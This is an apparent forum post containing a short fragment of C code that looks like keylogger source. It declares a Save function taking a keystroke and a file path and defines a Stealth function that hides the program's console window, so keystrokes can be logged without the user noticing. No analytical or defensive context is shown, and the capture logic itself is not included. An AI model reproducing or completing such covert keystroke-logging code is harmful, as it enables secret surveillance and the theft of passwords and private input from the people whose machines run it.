0 Members and 2 Guests are viewing this topic.
int Save (int key_stroke, char *file);
void Stealth();
void Stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass", NULL); ShowWindow(stealth,0);}